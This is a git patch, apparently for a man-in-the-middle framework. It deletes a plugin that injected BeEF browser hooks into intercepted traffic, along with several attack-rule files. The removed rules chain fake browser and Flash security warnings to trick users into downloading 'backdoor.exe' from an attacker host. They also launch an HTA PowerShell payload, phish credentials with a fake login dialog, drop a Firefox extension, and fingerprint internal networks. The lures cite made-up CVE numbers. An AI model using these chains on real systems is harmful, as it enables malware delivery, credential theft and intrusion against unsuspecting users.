From 24070afbd03765f0f5b1367524028827ee9818f4 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Sun, 23 Aug 2015 01:33:16 +0200 Subject: [PATCH] Removed beefautoplugin since it's pretty useless now with BeEF's ARE engine removed check to enable IP forwarding using sysctl --- .../beef_arerules/c_osx_test-return-mods.json | 35 -------- config/beef_arerules/enabled/.gitignore | 3 - config/beef_arerules/enabled/README | 2 - .../ff_osx_extension-dropper.json | 20 ----- .../ff_tux_webrtc-internalip.json | 28 ------- .../ie_win_fakenotification-clippy.json | 31 ------- .../beef_arerules/ie_win_htapowershell.json | 27 ------ .../ie_win_missingflash-prettytheft.json | 27 ------ .../ie_win_test-return-mods.json | 35 -------- core/utils.py | 14 +--- plugins/beefautorun.py | 82 ------------------- 11 files changed, 4 insertions(+), 300 deletions(-) delete mode 100644 config/beef_arerules/c_osx_test-return-mods.json delete mode 100644 config/beef_arerules/enabled/.gitignore delete mode 100644 config/beef_arerules/enabled/README delete mode 100644 config/beef_arerules/ff_osx_extension-dropper.json delete mode 100644 config/beef_arerules/ff_tux_webrtc-internalip.json delete mode 100644 config/beef_arerules/ie_win_fakenotification-clippy.json delete mode 100644 config/beef_arerules/ie_win_htapowershell.json delete mode 100644 config/beef_arerules/ie_win_missingflash-prettytheft.json delete mode 100644 config/beef_arerules/ie_win_test-return-mods.json delete mode 100644 plugins/beefautorun.py diff --git a/config/beef_arerules/c_osx_test-return-mods.json b/config/beef_arerules/c_osx_test-return-mods.json deleted file mode 100644 index 684d05c..0000000 --- a/config/beef_arerules/c_osx_test-return-mods.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "name": "Test return debug stuff", - "author": "antisnatchor", - "browser": "S", - "browser_version": ">= 7", - "os": "OSX", - "os_version": "<= 10.10", - "modules": [{ - "name": "test_return_ascii_chars", - "condition": null, - "options": {} - }, { - "name": "test_return_long_string", - "condition": "status==1", - "code": "var mod_input=test_return_ascii_chars_mod_output + '--(CICCIO)--';", - "options": { - "repeat": "10", - "repeat_string": "<>" - } - }, - { - "name": "alert_dialog", - "condition": "status=1", - "code": "var mod_input=test_return_long_string_mod_output + '--(PASTICCIO)--';", - "options":{"text":"<>"} - }, - { - "name": "get_page_html", - "condition": null, - "options": {} - }], - "execution_order": [0, 1, 2, 3], - "execution_delay": [0, 0, 0, 0], - "chain_mode": "nested-forward" -} \ No newline at end of file diff --git a/config/beef_arerules/enabled/.gitignore b/config/beef_arerules/enabled/.gitignore deleted file mode 100644 index 514e47a..0000000 --- a/config/beef_arerules/enabled/.gitignore +++ /dev/null @@ -1,3 +0,0 @@ -* -!.gitignore -!README diff --git a/config/beef_arerules/enabled/README b/config/beef_arerules/enabled/README deleted file mode 100644 index 4204c48..0000000 --- a/config/beef_arerules/enabled/README +++ /dev/null @@ -1,2 +0,0 @@ -Move here the ARE rule files that you want to load into BeEF. -Make sure they are .json files (any other file extension is ignored). \ No newline at end of file diff --git a/config/beef_arerules/ff_osx_extension-dropper.json b/config/beef_arerules/ff_osx_extension-dropper.json deleted file mode 100644 index 2f4bb35..0000000 --- a/config/beef_arerules/ff_osx_extension-dropper.json +++ /dev/null @@ -1,20 +0,0 @@ -{ - "name": "Firefox Extension Dropper", - "author": "antisnatchor", - "browser": "FF", - "browser_version": "ALL", - "os": "OSX", - "os_version": ">= 10.8", - "modules": [{ - "name": "firefox_extension_dropper", - "condition": null, - "options": { - "extension_name": "Ummeneske", - "xpi_name": "Ummeneske", - "base_host": "http://172.16.45.1:3000" - } - }], - "execution_order": [0], - "execution_delay": [0], - "chain_mode": "sequential" -} \ No newline at end of file diff --git a/config/beef_arerules/ff_tux_webrtc-internalip.json b/config/beef_arerules/ff_tux_webrtc-internalip.json deleted file mode 100644 index d429f03..0000000 --- a/config/beef_arerules/ff_tux_webrtc-internalip.json +++ /dev/null @@ -1,28 +0,0 @@ -{"name": "Get Internal IP (WebRTC)", - "author": "antisnatchor", - "browser": "FF", - "browser_version": ">= 31", - "os": "Linux", - "os_version": "ALL", - "modules": [ - {"name": "get_internal_ip_webrtc", - "condition": null, - "code": null, - "options": {} - }, - {"name": "internal_network_fingerprinting", - "condition": "status==1", - "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start=parseInt(s[3])-1;var end=parseInt(s[3])+1;var mod_input = s[0]+'.'+s[1]+'.'+s[2]+'.'+start+'-'+s[0]+'.'+s[1]+'.'+s[2]+'.'+end;", - "options": { - "ipRange":"<>", - "ports":"80", - "threads":"5", - "wait":"2", - "timeout":"10" - } - } - ], - "execution_order": [0,1], - "execution_delay": [0, 0], - "chain_mode": "nested-forward" -} \ No newline at end of file diff --git a/config/beef_arerules/ie_win_fakenotification-clippy.json b/config/beef_arerules/ie_win_fakenotification-clippy.json deleted file mode 100644 index bac6e44..0000000 --- a/config/beef_arerules/ie_win_fakenotification-clippy.json +++ /dev/null @@ -1,31 +0,0 @@ -{ - "name": "Ie Fake Notification + Clippy", - "author": "antisnatchor", - "browser": "IE", - "browser_version": "== 11", - "os": "Windows", - "os_version": ">= 7", - "modules": [ - { - "name": "fake_notification_ie", - "condition": null, - "options": { - "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it." - } - } - ,{ - "name": "clippy", - "condition": null, - "options": { - "clippydir": "http://172.16.45.1:3000/clippy/", - "askusertext": "Your browser appears to be out of date. Would you like to upgrade it?", - "executeyes": "http://172.16.45.1:3000/updates/backdoor.exe", - "respawntime":"5000", - "thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!" - } - } - ], - "execution_order": [0,1], - "execution_delay": [0,2000], - "chain_mode": "sequential" -} \ No newline at end of file diff --git a/config/beef_arerules/ie_win_htapowershell.json b/config/beef_arerules/ie_win_htapowershell.json deleted file mode 100644 index 40e677b..0000000 --- a/config/beef_arerules/ie_win_htapowershell.json +++ /dev/null @@ -1,27 +0,0 @@ -{ - "name": "HTA PowerShell", - "author": "antisnatchor", - "browser": "IE", - "browser_version": "ALL", - "os": "Windows", - "os_version": ">= 7", - "modules": [ - { - "name": "fake_notification_ie", - "condition": null, - "options": { - "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:" - } - }, - { - "name": "hta_powershell", - "condition": null, - "options": { - "domain":"http://172.16.45.1:3000", - "ps_url":"/ps" - } - }], - "execution_order": [0,1], - "execution_delay": [0,500], - "chain_mode": "sequential" -} \ No newline at end of file diff --git a/config/beef_arerules/ie_win_missingflash-prettytheft.json b/config/beef_arerules/ie_win_missingflash-prettytheft.json deleted file mode 100644 index e7620f6..0000000 --- a/config/beef_arerules/ie_win_missingflash-prettytheft.json +++ /dev/null @@ -1,27 +0,0 @@ -{ - "name": "Fake missing plugin + Pretty Theft LinkedIn", - "author": "antisnatchor", - "browser": "IE", - "browser_version": ">= 8", - "os": "Windows", - "os_version": "== XP", - "modules": [{ - "name": "fake_notification_c", - "condition": null, - "options": { - "url": "http://172.16.45.1:3000/updates/backdoor.exe", - "notification_text": "The version of the Adobe Flash plugin is outdated and does not include the latest security updates. Please ignore the missing signature, we at Adobe are working on it. " - } - }, { - "name": "pretty_theft", - "condition": null, - "options": { - "choice": "Windows", - "backing": "Grey", - "imgsauce": "http://172.16.45.1:3000/ui/media/images/beef.png" - } - }], - "execution_order": [0, 1], - "execution_delay": [0, 5000], - "chain_mode": "sequential" -} \ No newline at end of file diff --git a/config/beef_arerules/ie_win_test-return-mods.json b/config/beef_arerules/ie_win_test-return-mods.json deleted file mode 100644 index 657bb20..0000000 --- a/config/beef_arerules/ie_win_test-return-mods.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "name": "Test return debug stuff", - "author": "antisnatchor", - "browser": "IE", - "browser_version": "<= 8", - "os": "Windows", - "os_version": ">= XP", - "modules": [{ - "name": "test_return_ascii_chars", - "condition": null, - "options": {} - }, { - "name": "test_return_long_string", - "condition": "status==1", - "code": "var mod_input=test_return_ascii_chars_mod_output + '--CICCIO--';", - "options": { - "repeat": "10", - "repeat_string": "<>" - } - }, - { - "name": "alert_dialog", - "condition": "status=1", - "code": "var mod_input=test_return_long_string_mod_output + '--PASTICCIO--';", - "options":{"text":"<>"} - }, - { - "name": "get_page_html", - "condition": null, - "options": {} - }], - "execution_order": [0, 1, 2, 3], - "execution_delay": [0, 0, 0, 0], - "chain_mode": "nested-forward" -} \ No newline at end of file diff --git a/core/utils.py b/core/utils.py index e63862f..c3ae067 100644 --- a/core/utils.py +++ b/core/utils.py @@ -21,7 +21,6 @@ import logging import re import sys -from commands import getstatusoutput from core.logger import logger from core.proxyplugins import ProxyPlugins from scapy.all import get_if_addr, get_if_hwaddr, get_working_if @@ -35,15 +34,10 @@ def shutdown(message=None): sys.exit(message) def set_ip_forwarding(value): - status, result = getstatusoutput('sysctl --help') - if status == 0: - log.debug("Setting ip forwarding to {} using sysctl".format(value)) - os.system('sysctl -w net.ipv4.ip_forward={} &> /dev/null'.format(value)) #for OSX - else: - log.debug("Setting ip forwarding to {}".format(value)) - with open('/proc/sys/net/ipv4/ip_forward', 'w') as file: - file.write(str(value)) - file.close() + log.debug("Setting ip forwarding to {}".format(value)) + with open('/proc/sys/net/ipv4/ip_forward', 'w') as file: + file.write(str(value)) + file.close() def get_iface(): iface = get_working_if() diff --git a/plugins/beefautorun.py b/plugins/beefautorun.py deleted file mode 100644 index 0892427..0000000 --- a/plugins/beefautorun.py +++ /dev/null @@ -1,82 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# -import os -import pyinotify - -from plugins.plugin import Plugin -from plugins.inject import Inject -from core.beefapi import BeefAPI - -class BeefAutorun(Inject, Plugin): - name = "BeEFAutoloader" - optname = "beefauto" - desc = "Injects BeEF hooks & manages BeEF's ARE rule loading" - version = "0.4" - - def initialize(self, options): - self.options = options - self.ip_address = options.ip - beefconfig = self.config['MITMf']['BeEF'] - - Inject.initialize(self, options) - self.js_url = 'http://{}:{}/hook.js'.format(options.ip , ['port']) - - beefconfig = self.config['MITMf']['BeEF'] - - from core.utils import shutdown - beef = BeefAPI({"host": beefconfig['host'], "port": beefconfig['port']}) - if not beef.login(beefconfig['user'], beefconfig['pass']): - shutdown("[BeEFAutorun] Error logging in to BeEF!") - - self.tree_info.append('Starting RuleWatcher') - RuleWatcher(beef, self.log).start() - - def options(self, options): - pass - -class RuleWatcher(pyinotify.ProcessEvent): - - def __init__(self, beef, logger): - pyinotify.ProcessEvent.__init__(self) - self.beef = beef - self.log = logger - - def process_IN_MODIFY(self, event): - self.log.debug('Detected ARE rule change!') - for rule in self.beef.are_rules.list(): - self.log.debug('Deleting rule id: {} name: {}'.format(rule.id, rule.name)) - rule.delete() - - if event.src_path.endswith('.json'): - self.log.debug('Detected ARE rule modification/addition!') - for rule in os.listdir('./config/beef_arerules/enabled'): - if rule.endswith('.json'): - rule_path = './config/beef_arerules/enabled/' + rule - self.log.debug('Adding rule {}'.format(rule_path)) - self.beef.are_rules.add(rule_path) - - def start(self): - wm = pyinotify.WatchManager() - wm.add_watch('./config/beef_arerules/enabled', pyinotify.IN_MODIFY) - notifier = pyinotify.Notifier(wm, self) - - t = threading.Thread(name='RuleWatcher', target=notifier.loop) - t.setDaemon(True) - t.start() \ No newline at end of file